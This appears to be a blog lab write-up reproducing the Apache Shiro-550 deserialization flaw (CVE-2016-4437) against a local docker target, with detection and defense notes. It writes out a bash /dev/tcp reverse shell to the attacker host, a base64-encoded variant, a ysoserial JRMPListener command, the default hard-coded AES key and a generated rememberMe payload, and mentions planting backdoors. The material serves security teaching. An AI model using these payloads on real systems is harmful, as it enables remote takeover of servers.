Shiro-550漏洞分析与复现(CVE-2016-4437)

已于 2024-08-27 14:20:26 修改
阅读量2.7k 收藏 25
点赞数 47
分类专栏: 漏洞复现 文章标签: 安全
于 2024-07-26 13:49:29 首次发布

1.Shiro介绍

Shiro是一个由Apache提供的功能强大且易于使用的Java框架,它主要用于实现身份验证、授权、加密和会话管理等安全功能

2.Remember Me功能

Shiro中实现身份验证主要是靠Remember Me(记住我)功能,它允许用户在关闭浏览器后再次访问时无需重新登陆。用户登陆成功后生成一个加密的、包含用户身份信息的序列化对象,加密过程是 身份信息 -- 序列化 -- AES加密 -- base64编码 ,然后储存在remember Me的cookie中。当用户再次登录时,浏览器会携带这个remember Me发送给服务器。服务器解析从而获得用户身份信息,实现免登录访问,过程就是base64解码 -- AES解密 -- 反序列化 -- 身份信息 。

3.漏洞分析

Shiro550漏洞的关键在于AES密钥是硬编码。由于密钥是公开的,攻击者可以轻松的构造恶意的序列化对象,并使用相同的密钥进行加密,然后将加密的恶意对象注入到RememberMe Cookie中

当受害用户再次访问网站时,服务器会尝试解密并反序列化RememberMe Cookie中的内容。如果cookie中包含的是恶意序列化对象,那么反序列化过程中就会执行恶意代码,导致安全漏洞

4.漏洞验证

进行漏洞复现前,应该先验证漏洞是否存在。

未登录时:请求包的cookie中不应该有”rememberMe”字段,同时返回包的”set-Cookie”中也不应该有”rememberMe=deleteMe”字段

登录失败时:无论是否勾选”rememberMe”,返回的set-Cookie中通常会有”rememberMe=deleteMe”字段,但是这并不能直接说明存在漏洞

不勾选”rememberMe”登陆成功时:返回包的set-Cookie中会有”rememberMe”字段,但之后的所有请求中cookie都不会有”rememberMe”字段

勾选”rememberMe”登录成功时:返回包的set-cookie中不仅有”rememberMe=deleteMe”字段,还会有”remember”字段(包含加密和编码后的信息),之后所有的请求中cookie都会包含”rememberMe”字段

5.实验准备

攻击机kali ip: 192.168.3.183

靶机ubuntu ip: 192.168.3.163

需要用的工具下载

git clone https://github.com/fffffw1/shiro_exploit.git

会报错,原因是因为你没有对当前文件夹操作的权限,你需要授权

sudo chmod 777 /home/cdl/桌面/vulhub/shiro/CVE-2016-4437/

6.实验步骤

1.打开靶场

docker-compose up -d

输入你的ip+8080端口,即192.168.3.163:8080

2.用bp抓包查看

3.攻击机开启端口监听

nc -lvvp 6666

4.扫描AES加密的密钥

 python3 shiro_exploit.py -u http://192.168.3.163:8080

会报错 No module named 'Crypto',我们执行

pip install pycryptodome --break-system-packages

AES密钥kPH+bIxk5D2deZiIxcaaaA==

你会发现你没扫描到AES密钥,哈哈哈

这个原因是你的java版本不正确,需要安装jdk8

sudo apt-get install openjdk-8-jdk

切换jdk版本

sudo update-alternatives --config java

5.构建反弹shell

bash -i >& /dev/tcp/192.168.3.183/6666 0>&1

我们对反弹shell的命令进行base64编码

Runtime.exec Payload Generater | AresX's Blog

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

接下来我们利用序列化工具ysoserial.jar生成payload作用于靶机

这条命令配置了一个 JRMPListener 服务器,它监听在 TCP 端口 7777 上,准备接收通过 Java 远程方法协议(JRMP)发送的反序列化数据,并利用 CommonsCollections5 漏洞执行反弹shell命令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTYzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

6.生成一个针对 Apache Shiro rememberMe 功能的、经过 AES 加密并 Base64 编码的攻击载荷令牌

现在可以把我们第4步扫描到的AES密钥  kPH+bIxk5D2deZiIxcaaaA==  填在shiro.py文件中

生成一个针对 rememberMe 功能的 AES 加密并 Base64 编码的字符串

python3 shiro.py 192.168.3.163:7777

注意shiro.py的位置应当保证和ysoserial.jar在同一目录下,否则会报错找不到ysoserial.jar

rememberMe=6PugXuV8QeuuEwwPmezTO/bACLLHwDcedMJPBUFPEb4sIRGUYaxux4vqUATXl2vqjB+R0TVs/2Mvq1y5U23fCAoB8eXakTn56wfvSoX88OcRwjUAVi+yYnvcnZdsAqExBntdR0UevbLngr0MQp2eN74scQFkTodhlokJVIm8nziQzYx0mpgS8nLNjSVXKxtiaBULa3+mdTn183uQxLxMIzwEo7oRCmOTmNHuZj1INE/1Y0arW04tfitT2xbJtAE55D6y5pM9Ooi41upZqY398C22xgbm1Oubc1ld7wcJyikzQtO7srfwvxlYNYyjoOrR/9gFuPj3+76RhxrNHW3eI7o0QWDuuabobFoMUZEWdEh7wGgY7O84gUGEHHdmA3Sk/aNboTHjyn9odkUu4G+NIg==

而你,我的朋友,你会因为python2和python3格式的区别报错

7.获取反弹shell

点击提交出现如下图所示


两个监听的终端都有反应即为正常,没反应可能是构建反弹shell的ip错误


8.维持权限,创建后门等

7.流量特征

http请求头中有rememberme的字样和base64编码,把cookie值复制出来,解码再解密,就会发现恶意函数

8.防御

修改加密密钥,不随意使用公共密钥

升级版本,密钥硬编码问题存在于1.2.4以下的版本,升级到高版本,密钥就是随机生成的

禁用rememberme功能

Shiro-550 漏洞复现
qq_46440393的博客
03-15 2337
开始时间:2022/3/14 14:15 1、什么是shiro ? Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、shiro 可以用来干什么? 三个核心组件:Subject, SecurityManager 和 Realms. Subject:即“当前操作用户”。但是,在Shiro中,Subject这一概念并不仅仅指人
【渗透测试】-CVE-2016-4437-Shiro550漏洞复现
weixin_65311462的博客
09-13 1282
Shiro550漏洞CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。使用安全的加密算法和密钥管理策略来保护敏感数据。
Shiro历史漏洞复现 - Shiro-550
HAKUNAMATATATTA的博客
01-03 2554
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
shiro550反序列化漏洞(CVE-2016-4437)漏洞复现
最新发布
m0_74795359的博客
06-12 391
其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化,默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。访问对应地址,随便输入账号密码,bp抓包重发,可观察到rememberMe=deleteMe字样,基本可以确定网站是Apache Shiro搭建。
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-29 1426
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析复现及修复。
Shiro-550漏洞详解及复现
m0_64481831的博客
03-07 3102
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
Shiro 550漏洞复现
buffedon的博客
08-01 1795
Shiro 550 CVE-2016-4437Shiro简介ini配置文件漏洞原理环境搭建漏洞验证漏洞利用方法一漏洞利用方法二python 运行环境搭建生成 cookie替换cookie验证漏洞反弹shellNC设置监听漏洞利用方式三防御总结gadget 是什么,后续怎么利用 Shiro简介 Apache shiro是 java 的一个安全框架。相对于Spring Security 可能功能没有那么强大,但是实际工作中用不到那么多,因此小而简单的shiro就足够了 ini配置文件 存放一些初始数据 可以理解
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
人若无名,便可专心练剑
03-14 1695
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 780
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
Shiro550 反序列化漏洞CVE-2016-4437
qq_68163788的博客
06-20 1318
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
shiro反序列化漏洞详解复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 382
shiro反序列化漏洞shiro-550/CVE-2016-4437
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3039
CVE-2016-4437 Shiro反序列化漏洞复现
shiro550漏洞复现分析
Re_ly0n的博客
05-12 852
远程调试环境 本地搭建环境有点麻烦,索性就直接起docker,然后远程调试。进入vulnhub启动docker环境,使用exec命令进入容器 查看进程发现存在漏洞环境的jar包,docker cp 打包到本地使用jar -xvf XXX.jar解压jar包,解压完成的目录结构 将shirodemo-1.0-SNAPSHOT.jar包添加到libraries 再将BOOT-INF添加到Modules中 紧接着修改下dockerfile,如下 version: '2' serv
Shiro漏洞复现Shiro-550
weixin_51151498的博客
12-19 939
Shiro漏洞复现Shiro-550
Shiro550漏洞分析
12-04 356
Shiro550漏洞分析 环境 JDK8 shiro1.2.4 commons-collections-3.2.1 漏洞原理 Shiro安全框架登录时提供记住我功能,当登录时开启记住我功能时返回包会携带一个Cookie字段,键为rememberMe,下次登陆的时候携带返回包的Cookie进行,服务器端会把这个Cookie进行解码后反序列化。 客户端用rememberMe功能时,服务器端会把Cookie数据进行序列化,然后进行AES加密,再Base64编码,最后以rememberMe为键返回给客户端。 当客户
Shiro-550反序列化漏洞
zhuge_long的专栏
07-21 739
继续跟进到JcaChipherService的encrypt()方法,定义了一个ivBytes变量(CBC模式的初始化向量,用于每次AES加密之前或者解密之后,使用初始化向量明文或密文异或),是随机生成的16个字节组成的字节数组。跟进到encrypt()方法,其使用cipherService(生成的加密服务对象)的encrypt()方法将序列化数据进行加密,而加密方式AES加密,模式为CBC,密钥为128位(16个字节),填充方式为PKCS5Padding。
漏洞复现】Apache Shiro-550反序列化漏洞复现
isxiaole的博客
12-18 3373
1、Apache Shiro介绍 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、漏洞介绍 在Shiro <=1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的re.
Shiro反序列化550漏洞复现
故事讲予风听
07-05 1644
Shiro 是一个强大且易于使用的 Java 安全框架,用于身份验证、授权和会话管理等功能。它提供了一套灵活的基于角色的访问控制(RBAC)机制,可以轻松地集成到现有的 Java 应用程序中。影响版本原理shiro默认使用了Cookie RememberMe Manager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞shiro的身份认证工作流程。
Apache Shiro 目录穿越漏洞 CVE-2023-34478
07-29
很抱歉,但我没有找到关于Apache Shiro目录穿越漏洞CVE-2023-34478的相关信息。根据我所了解的情况,Apache Shiro在2022年6月29日披露了一个权限绕过漏洞CVE-2022-32532),该漏洞可能导致未经授权的远程攻击者绕过身份认证。Apache官方已发布修复此漏洞的版本,并建议用户尽快升级至Apache Shiro 1.9.1及以上版本以确保安全。\[1\]\[2\]\[3\] 请注意,我的回答是基于提供的引用内容,如果有任何其他信息或更新,请参考官方渠道获取最新信息。 #### 引用[.reference_title] - *1* *3* [[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)](https://blog.csdn.net/qq_51577576/article/details/126155240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Apache Shiro权限绕过漏洞CVE-2022-32532)](https://blog.csdn.net/weixin_54438700/article/details/128324850)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值